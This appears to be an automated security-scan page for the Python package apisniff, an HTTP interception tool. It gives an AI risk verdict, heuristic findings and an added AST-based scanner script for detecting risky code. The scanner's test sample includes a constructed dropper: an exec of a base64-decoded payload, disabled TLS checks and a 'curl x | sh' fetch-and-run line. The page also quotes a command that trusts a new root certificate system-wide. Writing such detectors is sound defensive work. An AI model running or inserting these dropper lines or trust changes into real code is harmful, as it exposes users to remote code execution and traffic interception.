apisniff

v0.1.3 suspicious
7.0
High Risk

Deprecated Python package. apisniff has moved to Go; install via Homebrew.

🤖 AI Analysis

Final verdict: SUSPICIOUS

The flagged behaviour (spawning a proxy process and a Chrome process, adding a certificate to the macOS keychain with `sudo security add-trusted-cert`, base64-decoding request and response bodies, and disabling TLS verification when an `insecure` option is set) is consistent with an HTTP capture tool built around a local interception proxy. It still warrants review before installation: the setup step trusts a new root certificate system-wide, which affects every TLS client on the host and persists after the tool exits, and the `insecure` option turns off certificate checking for the tool's own requests. No credential-harvesting pattern was found.

  • `sudo security add-trusted-cert -d -r ...` installs a certificate into the System keychain as a trusted root; this needs admin rights and changes what the whole machine trusts
  • TLS verification is disabled conditionally (`verify=not insecure`), not unconditionally; check what the CLI defaults `insecure` to

Per-check LLM notes
  • Network: httpx.AsyncClient is called with `verify=not insecure`, so certificate checking is off only when the caller opts in. A capture tool that routes traffic through its own CA may need this, but it should be off by default and the flag should be documented.
  • Shell: `security find-certificate -c ...` looks a certificate up in the keychain and `sudo security add-trusted-cert -d -r ...` installs one as a trusted root; the other two calls start the proxy and the browser. This is the expected setup for TLS interception, but a root trusted this way stays trusted until it is explicitly removed, so the package should offer an uninstall path.
  • Obfuscation: all four base64.b64decode calls decode `request_body` / `response_body` fields read at runtime, which is data handling rather than hidden code; on the snippets shown, this score is a false positive.
  • Credentials: no clear patterns indicating credential harvesting were detected, but further investigation into the package's functionality and context is recommended.
  • Metadata: a single maintainer with one package and an unstarred repository is a weak signal on its own; weigh it together with the behaviour above rather than separately.

📦 Package Quality Overall: Medium (5.2/10)

✦ High Test Suite 9.0

Test suite present — 27 test file(s) found

  • Test runner config found: conftest.py
  • Test runner config found: pyproject.toml
  • 27 test file(s) detected (e.g. conftest.py)
◈ Medium Documentation 5.0

Some documentation present

  • Detailed PyPI description (6163 chars)
○ Low Contributing Guide 2.0

No contributing guide or governance files found

  • No CONTRIBUTING, CODE_OF_CONDUCT, or governance files found
◈ Medium Type Annotations 5.0

Partial type annotation coverage

  • 254 type-annotated function signatures detected in source
◈ Medium Multiple Contributors 5.0

Limited contributor diversity

  • 1 unique contributor(s) across 100 commits in 4LAU/apisniff
  • Single author but highly active (100 commits)

🔬 Heuristic Checks

Outbound Network Calls score 4.5

Found 3 network call pattern(s)

  • ) try: async with httpx.AsyncClient( follow_redirects=True, timeout=_TIM
  • try: async with httpx.AsyncClient( timeout=_TIMEOUT, verify=no
  • : try: async with httpx.AsyncClient( timeout=_TIMEOUT, verify=not insecure, proxy=pr
Code Obfuscation score 8.0

Found 4 obfuscation pattern(s)

  • req_body = ( base64.b64decode(d["request_body"]) if d.get("request_body") else b""
  • resp_body = ( base64.b64decode(d["response_body"]) if d.get("response_body") else b""
  • try: return base64.b64decode(text) except Exception: return text.enco
  • resp_body: bytes = base64.b64decode(resp_body_text) except Exception:
Shell / Subprocess Execution score 8.0

Found 4 shell execution pattern(s)

  • N_KEYCHAIN): result = subprocess.run( ["security", "find-certificate", "-c", "mitmpro
  • r password.\n") result = subprocess.run([ "sudo", "security", "add-trusted-cert", "-d", "-r"
  • apture.\n") proxy_proc = subprocess.Popen( cmd, env=env, stdout=subprocess.DEVNULL, stderr=sub
  • ry: chrome_proc = subprocess.Popen( chrome_cmd, stdout=subproce
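The three checks above match on text fragments, which is why a conditional `verify=not insecure` and a base64 decode of a response body score the same as the unconditional `verify=False` and a decode of an embedded payload. The scanner below is an added illustration, not apisniff's code and not the scanner that produced this page: it walks the Python AST and separates `verify=False` from a conditional expression, a literal `sudo`/`security` argv from one built at runtime, and a base64 decode of an embedded literal from one applied to runtime data. The client and command lists, the severity labels and the sample source (which mirrors the shapes of the snippets above plus a dropper-style function for contrast) are constructed for the example; it needs Python 3.9+ for `ast.unparse`.

```python
"""AST-based versions of the Network / Obfuscation / Shell heuristics.

Added illustration, not apisniff's code and not the scanner behind this page.
Standard library only; Python 3.9+ for ast.unparse.
"""
import ast
from dataclasses import dataclass


@dataclass
class Finding:
    check: str      # "network", "shell" or "obfuscation"
    line: int
    detail: str
    severity: str   # "info" (expected), "review" (needs context), "high"


# Assumed lists; extend for the libraries and commands you care about.
HTTP_CLIENTS = {"httpx.AsyncClient", "httpx.Client", "requests.get",
                "requests.post", "requests.Session"}
SUBPROCESS_CALLS = {"subprocess.run", "subprocess.Popen", "subprocess.call",
                    "subprocess.check_output"}
DECODERS = {"base64.b64decode", "base64.urlsafe_b64decode"}
PRIVILEGED_COMMANDS = {"sudo", "security"}   # privilege escalation, macOS keychain CLI


def _dotted(node: ast.AST) -> str:
    """'httpx.AsyncClient' for a Name/Attribute chain, '' for anything else."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if isinstance(node, ast.Name):
        parts.append(node.id)
    return ".".join(reversed(parts))


def _keyword(call: ast.Call, name: str):
    return next((kw.value for kw in call.keywords if kw.arg == name), None)


def _literal_argv(argv) -> list:
    """Leading string literals of a list/tuple argv; stops at the first expression."""
    words = []
    if isinstance(argv, (ast.List, ast.Tuple)):
        for elt in argv.elts:
            if isinstance(elt, ast.Constant) and isinstance(elt.value, str):
                words.append(elt.value)
            else:
                break
    return words


def scan_source(source: str) -> list:
    findings = []
    for node in ast.walk(ast.parse(source)):
        if not isinstance(node, ast.Call):
            continue
        fn = _dotted(node.func)
        if fn in HTTP_CLIENTS:
            verify = _keyword(node, "verify")
            if verify is None:
                findings.append(Finding("network", node.lineno, f"{fn}: verify left at default", "info"))
            elif isinstance(verify, ast.Constant) and verify.value is False:
                findings.append(Finding("network", node.lineno, f"{fn}: verify=False, TLS checks always off", "high"))
            else:  # e.g. verify=not insecure: off only when the caller asks for it
                findings.append(Finding("network", node.lineno, f"{fn}: verify={ast.unparse(verify)}, conditional", "review"))
        elif fn in SUBPROCESS_CALLS:
            argv = node.args[0] if node.args else _keyword(node, "args")
            argv_text = ast.unparse(argv) if argv is not None else "?"
            shell = _keyword(node, "shell")
            words = _literal_argv(argv)
            if isinstance(shell, ast.Constant) and shell.value is True:
                findings.append(Finding("shell", node.lineno, f"{fn}: shell=True with {argv_text}", "high"))
            elif words and words[0] in PRIVILEGED_COMMANDS:
                sev = "high" if "sudo" in words else "review"
                findings.append(Finding("shell", node.lineno, f"{fn}: {' '.join(words)}", sev))
            elif words:
                findings.append(Finding("shell", node.lineno, f"{fn}: {' '.join(words)}", "info"))
            else:  # argv is a variable: the command is only known at runtime
                findings.append(Finding("shell", node.lineno, f"{fn}: argv built at runtime ({argv_text})", "review"))
        elif fn in DECODERS:
            arg = node.args[0] if node.args else None
            if isinstance(arg, ast.Constant):  # literal payload decoded in code: dropper pattern
                findings.append(Finding("obfuscation", node.lineno, f"{fn}: decodes an embedded literal", "high"))
            else:  # decoding a field read at runtime (request/response bodies) is data handling
                findings.append(Finding("obfuscation", node.lineno, f"{fn}: decodes runtime data", "info"))
    findings.sort(key=lambda f: f.line)
    return findings


def worst_severity(findings) -> str:
    order = {"info": 0, "review": 1, "high": 2}
    return max((f.severity for f in findings), key=order.__getitem__, default="info")


# Constructed sample: shapes from the report above plus a dropper for contrast.
SAMPLE = '''\
import base64, subprocess, httpx

async def fetch(url, insecure=False, proxy=None):
    async with httpx.AsyncClient(timeout=10, verify=not insecure, proxy=proxy) as c:
        return await c.get(url)

def decode_entry(d):
    return base64.b64decode(d["request_body"]) if d.get("request_body") else b""

def trust_cert(path):
    subprocess.run(["security", "find-certificate", "-c", "capture-ca"], capture_output=True)
    subprocess.run(["sudo", "security", "add-trusted-cert", "-d", "-r", "trustRoot", path])

def launch(cmd):
    return subprocess.Popen(cmd, stdout=subprocess.DEVNULL)

def dropper():
    exec(base64.b64decode("aW1wb3J0IG9z"))
    httpx.Client(verify=False)
    subprocess.Popen("curl x | sh", shell=True)
'''

if __name__ == "__main__":
    for f in scan_source(SAMPLE):
        print(f"{f.severity:6} line {f.line:2} {f.check:11} {f.detail}")
    print("worst:", worst_severity(scan_source(SAMPLE)))
```

Run against the sample, the capture-tool functions come out as `info` or `review` (the `sudo security add-trusted-cert` line is the one `high`, because it changes system-wide trust), while every line of `dropper` is `high`. That separation is what a practitioner wants from these checks; the one-score-per-pattern output above cannot make it.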
Credential Harvesting

No credential harvesting patterns detected

Typosquatting

No typosquatting candidates detected

Registered Email Domain

No author email provided

Suspicious Page Links

All external links appear legitimate

Git Repository History score 2.5

Git history flags: Repository has zero stars and zero forks

  • Repository has zero stars and zero forks
Maintainer History score 2.0

1 maintainer concern(s) found

  • Author "Aaron Lau" appears to have only 1 package on PyPI (new or inactive account)
Known CVE Vulnerabilities

No known vulnerabilities found in OSV database.

💡 AI App Starter Prompt

Use this prompt to build a project with apisniff
Create a network traffic analysis tool using the 'apisniff' Python package. Although 'apisniff' is deprecated and now available in Go, we will focus on its core functionalities as described in its documentation. Your task is to develop a simple yet powerful utility that monitors HTTP requests and responses within a local network segment. This tool should capture and display essential details such as the URL, method type (GET, POST, etc.), headers, and response status codes. Additionally, implement a feature to filter captured data based on specific keywords in URLs or headers, allowing users to quickly identify and analyze relevant traffic. Finally, ensure your application logs all captured data into a structured file format for later review and analysis.
